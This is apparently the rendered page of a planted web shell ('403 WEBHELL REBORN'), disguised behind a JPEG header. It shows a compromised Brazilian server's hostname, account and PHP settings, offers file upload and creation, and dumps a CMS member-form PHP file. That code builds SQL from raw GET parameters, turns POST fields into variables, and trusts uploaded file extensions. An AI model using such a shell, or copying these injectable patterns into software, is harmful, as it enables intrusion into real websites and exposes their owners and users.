ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64
User : farolpborg ( 1053)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/farolpborg/public_html/cms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/farolpborg/public_html/cms/membros-form.php
<?
$Pagina = "Membro";
$tabela = "membros";
$tabela2 = "membros_areas";
include("_includes/cabecalho.php");

$op = $_GET['op'];
$id = $_GET['id'];

if($op == "editar"){ $optx = 'salvar'; } else { $optx = 'adicionar'; }

foreach($_POST as $key => $valor){
    if(!is_array($valor)){
        $$key = addslashes($valor);
    } else {
        $$key = $valor;
    }
}

$integrante    = remove_aspas($_POST['integrante']);
$slug          = remove_acentos($_POST['integrante']);

$area_atuacao = isset($_POST['area_atuacao']) ? implode(',', $_POST['area_atuacao']) : '';

$imagem        = $_FILES['imagem']['tmp_name'];
$imagem_name   = $_FILES['imagem']['name'];

$imagem_ref    = "mem";
$imagem_data   = date("dmYHis");
$imagem_ext    = pathinfo($imagem_name, PATHINFO_EXTENSION);

$imagem_dir    = "../_shared/".$tabela;

if(!empty($id)){
	$sqldel = mysqli_query($conecta, "SELECT imagem FROM $tabela WHERE id='$id'");
	$resdel = mysqli_fetch_object($sqldel);
}

$sqlchk = mysqli_query($conecta, "SELECT slug FROM $tabela WHERE slug = '$slug'");
$reschk = mysqli_num_rows($sqlchk);
$ifslug = ($reschk == 1 ? '-'.mt_rand() : '');

$cpobgt  = '<section class="formulario">';
$cpobgt .= '<h1 title="'.$Pagina.'"><span>'.$Pagina.'</span></h1>';
$cpobgt .= '<p>';
$cpobgt .= '<strong>Campo(s) vazio(s):</strong><br><br>';
$cpobgt .= '- Nome do integrante<br>';
$cpobgt .= '- Descrição do integrante';
$cpobgt .= '</p>';
$cpobgt .= '<div><div class="clearfix"><input type="submit" value="Voltar" name="<?=$optx;?>" onclick="history.back();"></div></div>';
$cpobgt .= '</section>';

if(isset($_POST['salvar'])){
    
    if($op == 'editar'){
        
        if(!empty($imagem)){
			@unlink($imagem_dir."/".$resdel->imagem);
            
			$nova_imagem = $imagem_ref.$imagem_data.".".$imagem_ext;
            
            move_uploaded_file($imagem, "$imagem_dir/$nova_imagem");
            
			redimensionar_imagem($imagem_dir."/".$nova_imagem, $ImgNor, $ImgNor, $imagem_dir."/".$nova_imagem);
            redimensionar_imagem($imagem_dir."/".$nova_imagem, $ImgMin, $ImgMin, $imagem_dir."/min_".$nova_imagem);
            
			mysqli_query($conecta, "UPDATE $tabela SET imagem='$nova_imagem' WHERE id='$id'");
        }
        
        if(empty($integrante) || empty($bibliografia)){

            $erro = true;
            include("_ui/alerts.php");

            echo $cpobgt;
            exit;
        }
        
		mysqli_query($conecta, "UPDATE $tabela SET status='$status', posicao='$posicao', integrante='$integrante', funcao='$funcao', cargo='$cargo', area_atuacao='$area_atuacao', instituicao='$instituicao', email='$email', bibliografia='$bibliografia', linkedin='$linkedin', instagram='$instagram', facebook='$facebook', twitter='$twitter', youtube='$youtube', slug='$slug' WHERE id='$id'");
        
        $sucesso_salvar = true;
        
        $atividade = $atividade_editar.$id;
    
    }
    
}

if(isset($_POST['adicionar'])){
        
    if(!empty($imagem)){
        $nova_imagem = $imagem_ref.$imagem_data.".".$imagem_ext;

        move_uploaded_file($imagem, "$imagem_dir/$nova_imagem");

        redimensionar_imagem($imagem_dir."/".$nova_imagem, $ImgNor, $ImgNor, $imagem_dir."/".$nova_imagem);
        redimensionar_imagem($imagem_dir."/".$nova_imagem, $ImgMin, $ImgMin, $imagem_dir."/min_".$nova_imagem);
    }
        
    if(empty($integrante) || empty($bibliografia)){

        $erro = true;
        include("_ui/alerts.php");

        echo $cpobgt;
        exit;
    }
    
    mysqli_query($conecta, "INSERT INTO $tabela (status, posicao, imagem, integrante, funcao, cargo, area_atuacao, instituicao, email, bibliografia, linkedin, instagram, facebook, twitter, youtube, slug) VALUES ('$status', '$posicao', '$nova_imagem', '$integrante', '$funcao', '$cargo', '$area_atuacao', '$instituicao', '$email', '$bibliografia', '$linkedin', '$instagram', '$facebook', '$twitter', '$youtube', '$slug".$ifslug."')");

    $id = mysqli_insert_id($conecta);
    
    $sucesso_adicionar = true;

    $atividade = $atividade_adicionar.$id;

}

if($op == 'ativar'){

    mysqli_query($conecta, "UPDATE $tabela SET status='1' WHERE id='$id'");

    $atividade = $atividade_ativar.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op == 'desativar'){

    mysqli_query($conecta, "UPDATE $tabela SET status='0' WHERE id='$id'");

    $atividade = $atividade_desativar.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op == 'remover_imagem'){
    
    @unlink($imagem_dir."/".$resdel->imagem);
    @unlink($imagem_dir."/min_".$resdel->imagem);

    mysqli_query($conecta, "UPDATE $tabela SET imagem='' WHERE id='$id'");

    $atividade = $atividade_deletar_imagem.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'-form/editar/'.$id.'";</script>';

}

if($op == 'deletar'){
    
    @unlink($imagem_dir."/".$resdel->imagem);
    @unlink($imagem_dir."/min_".$resdel->imagem);
    
    mysqli_query($conecta, "DELETE FROM $tabela WHERE id='$id'");
    
    $atividade = $atividade_deletar.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op != 'ativar' && $op != 'desativar' && $op != 'deletar'){
    include("_ui/registros.php");
}

$sql = mysqli_query($conecta, "SELECT * FROM $tabela WHERE id='$id'");
$res = mysqli_fetch_object($sql);

$sqp = mysqli_query($conecta, "SELECT COUNT(posicao) + 1 AS posicao FROM $tabela");
$rep = mysqli_fetch_object($sqp);

include("_ui/alerts.php");
?>

<form method="post" action="" enctype="multipart/form-data">
<input name="id" type="hidden" value="<?=$id;?>">
<section class="formulario">
    <h1 title="<?=$Pagina;?>"><span><?=$Pagina;?></span></h1>
    <div>
        <label for="">Ativar?</label>
        <div class="clearfix cbx">
            <input type="checkbox" name="status" id="status" value="1"<? if($res->status == 1 || $op != "editar"){ ?> checked="checked"<? } ?>> <label for="status">Marcar para ativar</label><br>
        </div>
    </div>
    <div>
        <label for="posicao">Posição</label>
        <div class="clearfix mic">
            <input type="text" name="posicao" id="posicao" class="dapo" value="<? if($op == "editar"){ echo $res->posicao; } else { echo $rep->posicao; } ?>">
            <i class="zmdi zmdi-minus-circle dpo"></i>
            <i class="zmdi zmdi-plus-circle apo"></i>
        </div>
    </div>
    <div>
        <label for="integrante">Nome do membro</label>
        <div class="clearfix">
            <input type="text" name="integrante" id="integrante" class="tul" value="<?=$res->integrante;?>">
            <i class="zmdi zmdi-format-size tul" title="Capitular nome"></i>
        </div>
    </div>
    <div>
        <label for="funcao">Exerce alguma função no farol?</label>
        <div class="clearfix">
            <input type="text" name="funcao" id="funcao" class="tul" value="<?=$res->funcao;?>">
            <i class="zmdi zmdi-format-size tul" title="Capitular função"></i>
            <small>Ex.: Presidente</small>
        </div>
    </div>
    <div>
        <label for="cargo">Cargo</label>
        <div class="clearfix">
            <input type="text" name="cargo" id="cargo" class="tul" value="<?=$res->cargo;?>">
            <i class="zmdi zmdi-format-size tul" title="Capitular cargo"></i>
            <small>Ex.: Diretor</small>
        </div>
    </div>
    <div>
        <label for="area_atuacao">Área(s) de atuação</label>
        <div class="clearfix">
            <select id="area_atuacao" name="area_atuacao[]" multiple>
                <?
                    $sqa = mysqli_query($conecta, "SELECT * FROM $tabela2 ORDER BY area");
                    $sla = explode(',', $res->area_atuacao);
                    while($rea = mysqli_fetch_object($sqa)){
                        $areasa = remove_acentos($rea->area);
                        $selected = in_array($areasa, $sla) ? 'selected="selected"' : '';
                ?>
                <option value="<?=$areasa;?>"<?=$selected;?>><?=$rea->area;?></option>
                <? } ?>
            </select>
            <i class="zmdi zmdi-caret-down sos custom-icon" id="dropdownIcon"></i>
        </div>
    </div>
    <div>
        <label for="instituicao">Instituição</label>
        <div class="clearfix">
            <input type="text" name="instituicao" id="instituicao" class="tul" value="<?=$res->instituicao;?>">
            <i class="zmdi zmdi-format-size tul" title="Capitular instituição"></i>
            <small>Ex.: Google</small>
        </div>
    </div>
    <div>
        <label for="imagem">Foto do membro</label>
        <div class="clearfix">
            <input type="file" name="imagem" id="imagem" class="pim">
            <small>Min. <?=$ImgLog;?>px</small>
            <? if(!empty($res->imagem)){ ?><a href="<?=$Url;?>/_shared/<?=$tabela;?>/<?=$res->imagem;?>" title="Ampliar imagem" class="ampimg"><img src="<?=$Url;?>/_shared/<?=$tabela;?>/min_<?=$res->imagem;?>" width="auto" class="pim" alt="Ampliar imagem"></a><br>
            <a href="javascript:void(0);" onclick="confirma('<?=$mensagem_excluir;?>', '<?=$UrlCms;?>/<?=$tabela;?>-form/remover_imagem/<?=$res->id;?>');" title="Remover imagem"><i class="zmdi zmdi-delete"></i> Remover imagem</a><? } ?>
            <img src="#" class="pim" height="auto">
        </div>
    </div>
    <div>
        <label for="bibliografia">Mini bibliografia</label>
        <div class="clearfix">
            <textarea name="bibliografia" id="bibliografia"><?=stripslashes($res->bibliografia);?></textarea>
        </div>
    </div>
    <div>
        <label for="email">E-mail</label>
        <div class="clearfix">
            <input type="text" name="email" id="email" value="<?=$res->email;?>">
            <small>Ex.: email@email.com</small>
        </div>
    </div>
    <div>
        <label for="linkedin">Linkedin</label>
        <div class="clearfix">
            <input type="text" name="linkedin" id="linkedin" value="<?=$res->linkedin;?>">
            <small>Ex.: http://www.linkedin.com/google</small>
        </div>
    </div>
    <div>
        <label for="instagram">Instagram</label>
        <div class="clearfix">
            <input type="text" name="instagram" id="instagram" value="<?=$res->instagram;?>">
            <small>Ex.: http://www.instagram.com/google</small>
        </div>
    </div>
    <div>
        <label for="facebook">Facebook</label>
        <div class="clearfix">
            <input type="text" name="facebook" id="facebook" value="<?=$res->facebook;?>">
            <small>Ex.: http://www.facebook.com/google</small>
        </div>
    </div>
    <div>
        <label for="twitter">Twitter</label>
        <div class="clearfix">
            <input type="text" name="twitter" id="twitter" value="<?=$res->twitter;?>">
            <small>Ex.: http://www.twitter.com/google</small>
        </div>
    </div>
    <div>
        <label for="youtube">Youtube</label>
        <div class="clearfix">
            <input type="text" name="youtube" id="youtube" value="<?=$res->youtube;?>">
            <small>Ex.: http://www.youtube.com/channel/codigodocanal</small>
        </div>
    </div>
    <div>
        <div class="clearfix">
            <input type="submit" name="<?=$optx;?>" value="<?=$optx;?>"> <a href="<?=$UrlCms;?>/<?=$tabela;?>">Voltar</a>
        </div>
    </div>
</section>
</form>

<?
include("_includes/rodape.php");
?>

Anon7 - 2021